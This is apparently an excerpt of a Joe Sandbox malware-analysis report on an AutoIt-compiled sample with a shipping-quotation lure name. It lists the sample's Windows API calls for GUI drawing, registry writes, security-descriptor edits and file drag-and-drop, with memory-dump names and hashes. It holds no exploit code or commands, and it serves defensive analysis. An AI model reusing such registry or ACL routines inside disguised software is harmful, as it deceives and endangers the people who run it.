                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 006C7421
                                                                            • SetTextColor.GDI32(?,?), ref: 006C7425
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 006C743B
                                                                            • GetSysColor.USER32(0000000F), ref: 006C7446
                                                                            • CreateSolidBrush.GDI32(?), ref: 006C744B
                                                                            • GetSysColor.USER32(00000011), ref: 006C7463
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 006C7471
                                                                            • SelectObject.GDI32(?,00000000), ref: 006C7482
                                                                            • SetBkColor.GDI32(?,00000000), ref: 006C748B
                                                                            • SelectObject.GDI32(?,?), ref: 006C7498
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 006C74B7
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006C74CE
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 006C74DB
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006C752A
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006C7554
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 006C7572
                                                                            • DrawFocusRect.USER32(?,?), ref: 006C757D
                                                                            • GetSysColor.USER32(00000011), ref: 006C758E
                                                                            • SetTextColor.GDI32(?,00000000), ref: 006C7596
                                                                            • DrawTextW.USER32(?,006C70F5,000000FF,?,00000000), ref: 006C75A8
                                                                            • SelectObject.GDI32(?,?), ref: 006C75BF
                                                                            • DeleteObject.GDI32(?), ref: 006C75CA
                                                                            • SelectObject.GDI32(?,?), ref: 006C75D0
                                                                            • DeleteObject.GDI32(?), ref: 006C75D5
                                                                            • SetTextColor.GDI32(?,?), ref: 006C75DB
                                                                            • SetBkColor.GDI32(?,?), ref: 006C75E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 006C1128
                                                                            • GetDesktopWindow.USER32 ref: 006C113D
                                                                            • GetWindowRect.USER32(00000000), ref: 006C1144
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C1199
                                                                            • DestroyWindow.USER32(?), ref: 006C11B9
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006C11ED
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006C120B
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006C121D
                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 006C1232
                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 006C1245
                                                                            • IsWindowVisible.USER32(00000000), ref: 006C12A1
                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 006C12BC
                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 006C12D0
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006C12E8
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 006C130E
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 006C1328
                                                                            • CopyRect.USER32(?,?), ref: 006C133F
                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 006C13AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00648968
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00648970
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0064899B
                                                                            • GetSystemMetrics.USER32(00000008), ref: 006489A3
                                                                            • GetSystemMetrics.USER32(00000004), ref: 006489C8
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006489E5
                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006489F5
                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00648A28
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00648A3C
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00648A5A
                                                                            • GetStockObject.GDI32(00000011), ref: 00648A76
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00648A81
                                                                              • Part of subcall function 0064912D: GetCursorPos.USER32(?), ref: 00649141
                                                                              • Part of subcall function 0064912D: ScreenToClient.USER32(00000000,?), ref: 0064915E
                                                                              • Part of subcall function 0064912D: GetAsyncKeyState.USER32(00000001), ref: 00649183
                                                                              • Part of subcall function 0064912D: GetAsyncKeyState.USER32(00000002), ref: 0064919D
                                                                            • SetTimer.USER32(00000000,00000000,00000028,006490FC), ref: 00648AA8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI
                                                                            APIs
                                                                              • Part of subcall function 006910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00691114
                                                                              • Part of subcall function 006910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691120
                                                                              • Part of subcall function 006910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 0069112F
                                                                              • Part of subcall function 006910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691136
                                                                              • Part of subcall function 006910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0069114D
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00690DF5
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00690E29
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00690E40
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00690E7A
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00690E96
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00690EAD
                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00690EB5
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00690EBC
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00690EDD
                                                                            • CopySid.ADVAPI32(00000000), ref: 00690EE4
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00690F13
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00690F35
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00690F47
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690F6E
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690F75
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690F7E
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690F85
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690F8E
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690F95
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00690FA1
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690FA8
                                                                              • Part of subcall function 00691193: GetProcessHeap.KERNEL32(00000008,00690BB1,?,00000000,?,00690BB1,?), ref: 006911A1
                                                                              • Part of subcall function 00691193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00690BB1,?), ref: 006911A8
                                                                              • Part of subcall function 00691193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00690BB1,?), ref: 006911B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 006C02E5
                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006C04C5
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006C0504
                                                                              • Part of subcall function 0069223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00692258
                                                                              • Part of subcall function 0069223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0069228A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpper
                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 006AFE27
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 006AFE32
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 006AFE3D
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 006AFE48
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 006AFE53
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 006AFE5E
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 006AFE69
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 006AFE74
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 006AFE7F
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 006AFE8A
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 006AFE95
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 006AFEA0
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 006AFEAB
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 006AFEB6
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 006AFEC1
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 006AFECC
                                                                            • GetCursorInfo.USER32(?), ref: 006AFEDC
                                                                            • GetLastError.KERNEL32 ref: 006AFF1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                            • String ID:
                                                                            • API String ID: 3215588206-0
                                                                            • Opcode ID: 7b80ccde24ac3fcb75dd839fd4c5b8c84cf023b008f77f7249f44739f96bad84
                                                                            • Instruction ID: 34f65eafa03be8508b337116c5d8a2725edd577ff215a328977cedff3c186e82
                                                                            • Opcode Fuzzy Hash: 7b80ccde24ac3fcb75dd839fd4c5b8c84cf023b008f77f7249f44739f96bad84
                                                                            • Instruction Fuzzy Hash: B94151B0D043196EDB109FBA8C89C6EBFE9FF05364B50452AF11DE7281DB78A9018F91
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BC4BD
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,006CCC08,00000000,?,00000000,?,?), ref: 006BC544
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 006BC5A4
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 006BC6B2
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 006BC7C1
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 006BC84D
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006BC881
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BC88E
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 006BC960
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Value$Close$ConnectCreateRegistry
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 492116352-966354055
                                                                            • Opcode ID: 37d48d6c5167a0c8a50292dbedb4bb62fd2c8be7bb6af01a2ea3fb42b173b3d0
                                                                            • Instruction ID: 88464279d6a9e9eb1f46fc370adf4cbe2a17461566f741f5c148e96f598025c9
                                                                            • Opcode Fuzzy Hash: 37d48d6c5167a0c8a50292dbedb4bb62fd2c8be7bb6af01a2ea3fb42b173b3d0
                                                                            • Instruction Fuzzy Hash: 66126B756042019FDB54DF14C881E6AB7E6FF88724F04889DF89A9B3A2DB31ED41CB85
                                                                            APIs
                                                                            • LoadIconW.USER32(00000063), ref: 00695A2E
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00695A40
                                                                            • SetWindowTextW.USER32(?,?), ref: 00695A57
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00695A6C
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00695A72
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00695A82
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00695A88
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00695AA9
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00695AC3
                                                                            • GetWindowRect.USER32(?,?), ref: 00695ACC
                                                                            • SetWindowTextW.USER32(?,?), ref: 00695B6F
                                                                            • GetDesktopWindow.USER32 ref: 00695B75
                                                                            • GetWindowRect.USER32(00000000), ref: 00695B7C
                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00695BD3
                                                                            • GetClientRect.USER32(?,?), ref: 00695BE0
                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00695C05
                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00695C2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: 642fe5b32b93e281451be319ffc161dc19950f8f9d3baf59ad2d8fdb67eae76c
                                                                            • Instruction ID: 2eb29417fe51611f9244761856da7161a53c49deb932e3feb44c9fc558acbb9a
                                                                            • Opcode Fuzzy Hash: 642fe5b32b93e281451be319ffc161dc19950f8f9d3baf59ad2d8fdb67eae76c
                                                                            • Instruction Fuzzy Hash: F1718F31900B059FDF21DFA9CE95EAEBBFAFF48714F104518E547A2AA0D775A940CB10
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 006C9147
                                                                              • Part of subcall function 006C7674: ClientToScreen.USER32(?,?), ref: 006C769A
                                                                              • Part of subcall function 006C7674: GetWindowRect.USER32(?,?), ref: 006C7710
                                                                              • Part of subcall function 006C7674: PtInRect.USER32(?,?,006C8B89), ref: 006C7720
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 006C91B0
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006C91BB
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006C91DE
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 006C9225
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 006C923E
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 006C9255
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 006C9277
                                                                            • DragFinish.SHELL32(?), ref: 006C927E
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006C9371
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#p
                                                                            • API String ID: 221274066-541875553
                                                                            • Opcode ID: b1e0d9c4eaa0694e8a3a09721b17123052017964203533c74379a395b7c3d29d
                                                                            • Instruction ID: e7f44859ca9893cbafc3d6d408e21c459bbd784d6c894199cadb07e84a41049f
                                                                            • Opcode Fuzzy Hash: b1e0d9c4eaa0694e8a3a09721b17123052017964203533c74379a395b7c3d29d
                                                                            • Instruction Fuzzy Hash: 29618E71108301AFC701DF50DC85EAFBBEAEFC8750F40492DF595921A0DB709A49CBA6
                                                                            APIs
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0070070C,00000FA0,429C1377,?,?,?,?,006723B3,000000FF), ref: 0065011C
                                                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006723B3,000000FF), ref: 00650127
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006723B3,000000FF), ref: 00650138
                                                                            • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0065014E
                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0065015C
                                                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0065016A
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,006723B3,000000FF), ref: 006501B5
                                                                            • DeleteCriticalSection.KERNEL32(0070070C,00000007,?,?,?,?,006723B3,000000FF), ref: 006501E1
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,006723B3,000000FF), ref: 006501F1
                                                                            Strings
                                                                            • InitializeConditionVariable, xrefs: 00650148
                                                                            • SleepConditionVariableCS, xrefs: 00650154
                                                                            • kernel32.dll, xrefs: 00650133
                                                                            • WakeAllConditionVariable, xrefs: 00650162
                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00650122
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleProc$CriticalModuleSection$CloseCountCreateDeleteEventInitializeSpin
                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                            • API String ID: 3758863719-1714406822
                                                                            • Opcode ID: ecd2bfe12a9f30fb1b1faa1d8542266165d85fdd5ff1b213590c00b0db4b62be
                                                                            • Instruction ID: 2b3d055390a9eab879d04545e3b395eecc82f8e565e30a52e3167ad0057cfd59
                                                                            • Opcode Fuzzy Hash: ecd2bfe12a9f30fb1b1faa1d8542266165d85fdd5ff1b213590c00b0db4b62be
                                                                            • Instruction Fuzzy Hash: 2721A671A40700AFEB215BB5AC49F7A37DBEB44B72F045229FC05D2790DE78D8048A95
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,006CCC08), ref: 006B40BB
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006B40CD
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,006CCC08), ref: 006B40F2
                                                                            • FreeLibrary.KERNEL32(00000000,?,006CCC08), ref: 006B413E
                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,006CCC08), ref: 006B41A8
                                                                            • SysFreeString.OLEAUT32(00000009), ref: 006B4262
                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006B42C8
                                                                            • SysFreeString.OLEAUT32(?), ref: 006B42F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 354098117-199464113
                                                                            • Opcode ID: 864dd0c533092901c3c8c7a9c2a397c5d4942a856c5a070634000475e3b03f22
                                                                            • Instruction ID: 6c1a0430045dc7766c312075d7ce26892755fd63e1338542e49ec56e302e844f
                                                                            • Opcode Fuzzy Hash: 864dd0c533092901c3c8c7a9c2a397c5d4942a856c5a070634000475e3b03f22
                                                                            • Instruction Fuzzy Hash: 19120CB5A00115EFDB14DF94C884EEEBBB6FF45314F248098E9059B252DB71ED86CBA0
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 006C09C6
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006C0A54
                                                                              • Part of subcall function 00692BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00692BFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
